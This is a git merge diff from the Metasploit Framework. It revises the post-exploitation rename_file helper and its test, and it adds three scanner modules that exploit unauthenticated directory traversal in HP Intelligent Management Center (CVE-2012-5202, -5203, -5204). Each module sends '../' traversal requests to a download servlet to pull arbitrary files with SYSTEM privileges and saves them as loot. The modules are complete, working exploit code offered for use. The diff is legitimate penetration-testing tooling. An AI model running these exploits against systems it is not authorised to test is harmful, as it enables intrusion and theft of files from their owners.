Merge branch 'master' of https://github.com/rapid7/metasploit-framework

lib/msf/core/post/file.rb

@@ -299,13 +299,18 @@ module Msf::Post::File
 	end
 
 	#
-	# Rename a remote file.  This is a stopgap until a proper API version is added:
-	# http://dev.metasploit.com/redmine/issues/7288
+	# Rename a remote file.
 	#
-	def rename_file(new_file, old_file)
-		#TODO:  this is not ideal as the file contents are sent to meterp server and back to the client
-		write_file(new_file, read_file(old_file))
-		rm_f(old_file)
+	def rename_file(old_file, new_file)
+		if session.respond_to? :commands and session.commands.include?("stdapi_fs_file_move")
+			session.fs.file.mv(old_file, new_file)
+		else
+				if session.platform =~ /win/
+					cmd_exec(%Q|move /y "#{old_file}" "#{new_file}"|)
+				else
+					cmd_exec(%Q|mv -f "#{old_file}" "#{new_file}"|)
+				end
+		end
 	end
 	alias :move_file :rename_file
 	alias :mv_file :rename_file

modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb

@@ -0,0 +1,104 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'HP Intelligent Management FaultDownloadServlet Directory Traversal',
+			'Description'    => %q{
+					This module exploits a lack of authentication and a directory traversal in HP
+				Intelligent Management, specifically in the FaultDownloadServlet, in order to
+				retrieve arbitrary files with SYSTEM privileges. This module has been tested
+				successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-5202' ],
+					[ 'OSVDB', '91027' ],
+					[ 'BID', '58675' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-051/' ]
+				]
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+				OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+				# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+				OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+			], self.class)
+	end
+
+	def is_imc?
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "login.jsf"),
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+			return true
+		else
+			return false
+		end
+	end
+
+	def my_basename(filename)
+		return ::File.basename(filename.gsub(/\\/, "/"))
+	end
+
+	def run_host(ip)
+
+		if not is_imc?
+			vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+			return
+		end
+
+		travs = ""
+		travs << "../" * datastore['DEPTH']
+		travs << datastore['FILEPATH']
+
+		vprint_status("#{rhost}:#{rport} - Sending request...")
+		res = send_request_cgi({
+			'uri'          => normalize_uri(target_uri.path.to_s, "tmp", "fault", "download"),
+			'method'       => 'GET',
+			'vars_get'     =>
+				{
+					'fileName' => travs
+				}
+		})
+
+		if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+			contents = res.body
+			fname = my_basename(datastore['FILEPATH'])
+			path = store_loot(
+				'hp.imc.faultdownloadservlet',
+				'application/octet-stream',
+				ip,
+				contents,
+				fname
+			)
+			print_good("#{rhost}:#{rport} - File saved in: #{path}")
+		else
+			vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+			return
+		end
+	end
+end

modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb

@@ -0,0 +1,104 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'HP Intelligent Management IctDownloadServlet Directory Traversal',
+			'Description'    => %q{
+					This module exploits a lack of authentication and a directory traversal in HP
+				Intelligent Management, specifically in the IctDownloadServlet, in order to
+				retrieve arbitrary files with SYSTEM privileges. This module has been tested
+				successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-5204' ],
+					[ 'OSVDB', '91029' ],
+					[ 'BID', '58676' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ]
+				]
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+				OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+				# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+				OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+			], self.class)
+	end
+
+	def is_imc?
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "login.jsf"),
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+			return true
+		else
+			return false
+		end
+	end
+
+	def my_basename(filename)
+		return ::File.basename(filename.gsub(/\\/, "/"))
+	end
+
+	def run_host(ip)
+
+		if not is_imc?
+			vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+			return
+		end
+
+		travs = ""
+		travs << "../" * datastore['DEPTH']
+		travs << datastore['FILEPATH']
+
+		vprint_status("#{rhost}:#{rport} - Sending request...")
+		res = send_request_cgi({
+			'uri'          => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"),
+			'method'       => 'GET',
+			'vars_get'     =>
+				{
+					'fileName' => travs
+				}
+		})
+
+		if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+			contents = res.body
+			fname = my_basename(datastore['FILEPATH'])
+			path = store_loot(
+				'hp.imc.faultdownloadservlet',
+				'application/octet-stream',
+				ip,
+				contents,
+				fname
+			)
+			print_good("#{rhost}:#{rport} - File saved in: #{path}")
+		else
+			vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+			return
+		end
+	end
+end

modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb

@@ -0,0 +1,104 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'HP Intelligent Management ReportImgServlt Directory Traversal',
+			'Description'    => %q{
+					This module exploits a lack of authentication and a directory traversal in HP
+				Intelligent Management, specifically in the ReportImgServlt, in order to retrieve
+				arbitrary files with SYSTEM privileges. This module has been tested successfully on
+				HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-5203' ],
+					[ 'OSVDB', '91028' ],
+					[ 'BID', '58672' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-052/' ]
+				]
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+				OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+				# By default files downloaded from C:\Program Files\iMC\client\bin\
+				OptInt.new('DEPTH', [true, 'Traversal depth', 4])
+			], self.class)
+	end
+
+	def is_imc?
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "login.jsf"),
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+			return true
+		else
+			return false
+		end
+	end
+
+	def my_basename(filename)
+		return ::File.basename(filename.gsub(/\\/, "/"))
+	end
+
+	def run_host(ip)
+
+		if not is_imc?
+			vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+			return
+		end
+
+		travs = ""
+		travs << "../" * datastore['DEPTH']
+		travs << datastore['FILEPATH']
+
+		vprint_status("#{rhost}:#{rport} - Sending request...")
+		res = send_request_cgi({
+			'uri'          => normalize_uri(target_uri.path.to_s, "reportImg"),
+			'method'       => 'GET',
+			'vars_get'     =>
+				{
+					'path' => travs
+				}
+		})
+
+		if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "image/png"
+			contents = res.body
+			fname = my_basename(datastore['FILEPATH'])
+			path = store_loot(
+				'hp.imc.faultdownloadservlet',
+				'application/octet-stream',
+				ip,
+				contents,
+				fname
+			)
+			print_good("#{rhost}:#{rport} - File saved in: #{path}")
+		else
+			vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+			return
+		end
+	end
+end

test/modules/post/test/file.rb

@@ -13,11 +13,10 @@ class Metasploit4 < Msf::Post
 
 	def initialize(info={})
 		super( update_info( info,
-				'Name'          => 'Testing remote file manipulation',
+				'Name'          => 'Testing Remote File Manipulation',
 				'Description'   => %q{ This module will test Post::File API methods },
 				'License'       => MSF_LICENSE,
 				'Author'        => [ 'egypt'],
-				'Version'       => '$Revision$',
 				'Platform'      => [ 'windows', 'linux', 'java' ],
 				'SessionTypes'  => [ 'meterpreter', 'shell' ]
 			))
@@ -102,6 +101,23 @@ class Metasploit4 < Msf::Post
 			not file_exist?("pwned")
 		end
 
+		it "should move files" do
+				# Make sure we don't have leftovers from a previous run
+				file_rm("meterpreter-test") rescue nil
+				file_rm("meterpreter-test-moved") rescue nil
+
+				# touch a new file
+				write_file("meterpreter-test", "")
+
+				rename_file("meterpreter-test", "meterpreter-test-moved")
+				res &&= exist?("meterpreter-test-moved")
+				res &&= !exist?("meterpreter-test")
+
+				# clean up
+				file_rm("meterpreter-test") rescue nil
+				file_rm("meterpreter-test-moved") rescue nil
+		end
+
 	end
 
 	def test_binary_files